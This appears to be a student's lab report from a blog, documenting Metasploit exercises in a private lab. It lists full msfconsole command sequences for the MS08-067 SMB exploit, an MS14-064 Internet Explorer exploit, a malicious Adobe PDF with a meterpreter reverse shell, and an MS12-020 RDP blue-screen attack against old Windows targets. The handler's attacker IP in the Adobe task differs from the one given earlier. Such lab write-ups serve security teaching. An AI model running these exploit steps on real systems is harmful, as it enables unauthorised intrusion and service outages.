• 20192422李俊洁 实验六 Metasploit攻击渗透实践


    实验六 Metasploit攻击渗透实践 20192422李俊洁

    一.实验过程

    任务一 一个主动攻击实践

    我选择查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击
    攻击机:Kali GNU/Linux
    ip地址:192.168.56.107
    靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
    ip地址:192.168.56.109

    1.检测连通性

    2.xp设置

    关闭防火墙。关闭自动更新

    3.linux执行

    msfconsole//进入msfconsole
    search MS08-067//查找模块
    use exploit/windows/smb/ms08_067_netapi//选择模块
    set payload generic/shell_reverse_tcp//使用载荷
    set lhost 192.168.56.107//攻击机ip
    set lport 4567//端口
    set RHOSTS 192.168.56.109//靶机ip
    最终配置如下

    exploit//开始渗透

    可见攻击成功了

    任务二 一个针对浏览器的攻击

    攻击机:Kali GNU/Linux
    ip地址:192.168.56.107
    靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
    ip地址:192.168.56.104

    1.linux执行

    msfconsole
    search exploit Microsoft Internet Explorer//查找和Windows的IE浏览器相关的漏洞

    选择了2014年11月发布的漏洞exploit/windows/browser/ms14_064_ole_code_execution

    进行配置
    use exploit/windows/browser/ms14_064_ole_code_execution
    set LHOST 192.168.56.107//设置攻击机ip
    exploit

    将生成的网址http://192.168.56.107:8080/RceGKvyM在靶机中打开


    成功获取到shell,可见攻击成功了

    任务三 针对客户端攻击

    选择对Adobe的攻击
    攻击机:Kali GNU/Linux
    ip地址:192.168.56.107
    靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
    ip地址:192.168.56.104

    1.linux执行

    msfconsole
    search adobe//查找Adobe漏洞

    use windows/fileformat/adobe_cooltype_sing //使用漏洞
    set payload windows/meterpreter/reverse_tcp //选择攻击载荷
    set LHOST 192.168.56.107 //攻击者地址
    set FILENAME 20192422ljj.pdf //设置生成pdf文件
    exploit //攻击

    将生成的文件放入靶机中(靶机需提前安全adobe)
    Linux下:
    back
    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp //选择攻击载荷
    set LHOST 192.168.81.129 //攻击者地址
    exploit


    可以看出攻击成功了

    任务四 成功应用任何一个辅助模块

    我选择实现MS12-020(CVE-2012-0002)蓝屏攻击
    攻击机:Kali GNU/Linux
    ip地址:192.168.56.107
    靶机:Windows 2000
    ip地址:192.168.56.108
    msfconsole
    search ms12-020 //搜索漏洞
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    set RHOST 192.168.56.108//靶机地址
    exploit

    可见靶机被蓝屏了,攻击成功

    二.实验中遇见的问题

    1.关于任务一,我迟迟无法进行连接

    解决方法:忽略了防火墙和自动更新问题,将其都关闭都,再重启,即可成功连接,即攻击成功

    2.关于任务二,我尝试使用不同的漏洞,但是仅2014年11月发布的漏洞可以生成能够连接的网址,其他漏洞要么无法生成网址,要么网址无法连接,即404

    解决方法:使用2014的漏洞

    三.实验感想

    通过本次实验,我再次了解到了msfconsole的强大功能,同时对于msfconsole自带的辅助软件也有了一些了解。虽然前几次实验也使用过msfconsole,但是这次实验让我系统地了解了它的六大模块,可谓是受益匪浅。
    感谢老师的指导,同学们的帮助,期待下一次的实验。

  • 相关阅读:
    软件架构实现
    UVa644
    如何理解Hibernate中的HibernateSessionFactory类
    在pcDuino上使用蓝牙耳机玩转音乐
    Java Web----Java Web的数据库操作(三)
    Pylons Controller里面Session.commit()总是出现rollback
    ORACLE的SQL JOIN方式小结
    关于数据库学习进阶的一点体悟
    IO is frozen on database xxx, No user action is required
    ORACLE等待事件:enq: TX
  • 原文地址:https://www.cnblogs.com/dahuangren/p/16274416.html
Copyright © 2020-2023  润新知